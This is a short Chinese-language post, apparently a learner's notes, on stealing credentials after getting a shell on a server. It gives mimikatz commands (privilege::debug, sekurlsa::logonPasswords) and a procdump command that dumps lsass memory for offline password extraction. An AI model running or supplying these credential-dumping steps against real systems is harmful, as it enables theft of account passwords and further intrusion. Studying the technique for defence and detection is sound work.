当我们getshell之后,一般是提权拿下远程服务器,刚学习了一个直接读取远程服务器的密码的工具mimikatz
首先先利用 privilege::debug 提生权限
sekurlsa::logonPasswords就是抓取密码
这是我本机的,空密码
另外当无法上传mimikatz工具到目标服务器时,可以利用procdump把lsass进程的内存文件导出本地,再在本地利用mimikatz读取密码
procdump64.exe -accepteula -ma lsass.exe lsass.dmp 导出为lsass.dump文件
把lsass.dmp放在mimikatz目录利用
这样就读出了密码的sha1加密的密码